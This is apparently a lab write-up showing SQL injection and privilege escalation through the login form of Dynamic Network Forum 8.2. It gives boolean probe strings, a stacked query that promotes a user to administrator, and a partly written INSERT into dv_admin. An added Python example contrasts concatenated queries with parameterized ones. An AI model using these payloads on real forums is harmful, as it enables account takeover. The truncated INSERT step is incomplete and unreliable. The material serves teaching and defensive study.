I. Purpose of the experiment
Understand the principle of Dynamic Network Forum 8.2
II. Experiment principle
In the Dynamic Network Forum user login process, input filtering is lax, which allows SQL injection and privilege escalation. The vulnerability is in the source file login.asp.
III. Experimental environment
This machine: 192.168.1.2
Target machine: 192.168.1.3
IV. Experiment steps
First, normal registration and login
1. Visit the address http://192.168.1.3:8010/, as shown:
2. Register a user first: san, password: 123456, as shown:
Second, vulnerability testing and exploitation
1. Log out of san and open the login page:
2. Log in using the following statement as the user name: san' and 'a'='a' Password: 123456
3. Log in again using the following statement as the user name: san' and 'a'='B' Password: 123456
4. The forum reports that the user does not exist, which shows that the statement above takes effect. In the user name field, enter:
,; update dv_user set usergroupid=1 where Username='san'--
5. The forum reports that the user name does not exist. Log in again with the correct user name and password (san / 123456). In the control panel, click "What can I do"; the account is now shown as a member of the Administrators group.
6. With san now an administrator, log out and log in again using the following statement as the user name, with the correct password (this step is important):
san'; INSERT into dv_admin
7. Open the administrator interface: http://192.168.1.3:8010/admin
Log in with user name: admin, password: 123456. The login succeeds.
8. After logging in, the account has the administrator identity, as shown:
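
The flaw named in the principle section and confirmed by steps 2 to 4, modelled as an added example (not code from login.asp or from the original write-up): a login lookup that concatenates the user name into the SQL text, beside a parameterized one. The query shape, the userpassword column and the usergroupid value are assumptions, and SQLite stands in for the forum's database.

```python
import sqlite3

# Probe strings from steps 2 and 3; in this model the query template
# supplies the closing quote, so the probes end without one.
TRUE_PROBE = "san' and 'a'='a"
FALSE_PROBE = "san' and 'a'='b"


def make_db():
    """Constructed sample data: the one member registered in the lab."""
    db = sqlite3.connect(":memory:")
    db.execute(
        "CREATE TABLE dv_user "
        "(username TEXT, userpassword TEXT, usergroupid INTEGER)"
    )
    # usergroupid 4 is a constructed value for an ordinary member.
    db.execute("INSERT INTO dv_user VALUES ('san', '123456', 4)")
    return db


def _check(row, password):
    if row is None:
        return "user does not exist"
    return "ok" if row[0] == password else "wrong password"


def login_concat(db, username, password):
    """Assumed vulnerable pattern: user name pasted into the SQL text."""
    sql = "SELECT userpassword FROM dv_user WHERE username='" + username + "'"
    return _check(db.execute(sql).fetchone(), password)


def login_param(db, username, password):
    """Hardened form: user name bound as data, never parsed as SQL."""
    sql = "SELECT userpassword FROM dv_user WHERE username=?"
    return _check(db.execute(sql, (username,)).fetchone(), password)


if __name__ == "__main__":
    db = make_db()
    for name in ("san", TRUE_PROBE, FALSE_PROBE):
        print(repr(name),
              "| concat:", login_concat(db, name, "123456"),
              "| param:", login_param(db, name, "123456"))
```

With concatenation the two probes produce different answers, which is the behaviour step 4 relies on; with the bound parameter both are treated as a literal, non-existent user name.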